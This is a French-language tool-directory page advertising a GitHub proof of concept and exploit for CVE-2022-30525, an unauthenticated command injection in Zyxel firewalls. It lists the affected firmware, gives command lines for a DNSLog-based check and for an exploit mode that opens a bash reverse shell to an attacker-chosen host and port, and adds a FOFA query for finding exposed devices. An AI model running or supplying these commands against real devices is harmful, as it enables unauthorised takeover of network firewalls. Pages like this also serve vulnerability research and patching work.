Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-30525 — CVE-2022-30525 Zyxel 防火墙命令注入漏洞 POC&EXPC | Kitploit
Outils/GitHubGitHub/west9b/cve-2022-30525
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubwest9b/cve-2022-30525

CVE-2022-30525

CVE-2022-30525 Zyxel 防火墙命令注入漏洞 POC&EXPC

Voir le dépôt
123il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-30525 Vulnérabilité d'injection de commandes dans les pare-feu Zyxel

CVE-2022-30525 POC & EXP

auteur: 160team.west9B

Réservé aux chercheurs en sécurité avec autorisation. Conformez-vous à la loi sur la cybersécurité. Toute conséquence relève de la responsabilité de l'utilisateur, non de l'auteur.

01-Introduction

Le 12 mai 2022, Zyxel a publié un bulletin de sécurité corrigeant une vulnérabilité d'injection de commandes à distance non authentifiée (CVE-2022-30525) dans ses appareils pare-feu, avec un score CVSS de 9.8. Cette vulnérabilité existe dans les programmes CGI de certaines versions de pare-feu Zyxel, permettant l'exécution de commandes arbitraires sur l'appareil affecté sans authentification.

Versions concernées:

  • Série ATP : firmware 5.10-5.21 Patch 1

  • Série VPN : firmware 4.60-5.21 Patch 1

  • USG FLEX 100(W), 200, 500, 700 : 5.00-5.21 Patch 1

  • USG FLEX 50(W)/USG20(W)-VPN : 5.10-5.21 Patch 1

02-Instructions d'utilisation

usage_poc: ./cve-2022-30525 -m poc -u url

usage_exp: ./cve-2022-30525 -m exp -u url -lhost ip -lport port

1. POC

L'exécution de commandes de cette vulnérabilité n'a pas de retour. Par conséquent, la vérification POC envoie une requête à l'API DNSLog. Si DNSLog reçoit une requête, la vulnérabilité existe. Pour éviter les faux positifs dus à la latence réseau, la vérification DNSLog attend 10 secondes.

usage_poc: ./cve-2022-30525 -m poc -u https://192.168.1.1/

2. exp

exp : reverse shell bash. Après -m exp, spécifiez l'adresse IP du VPS et le port.

**usage_exp:./cve-2022-30525 -m exp -u https://192.168.1.1/ -lhost 192.168.1.2 -lport 1337 **

Captures d'écran

Image Image

Référence

https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/

fofa

title="USG FLEX xx"

Télécharger l’outil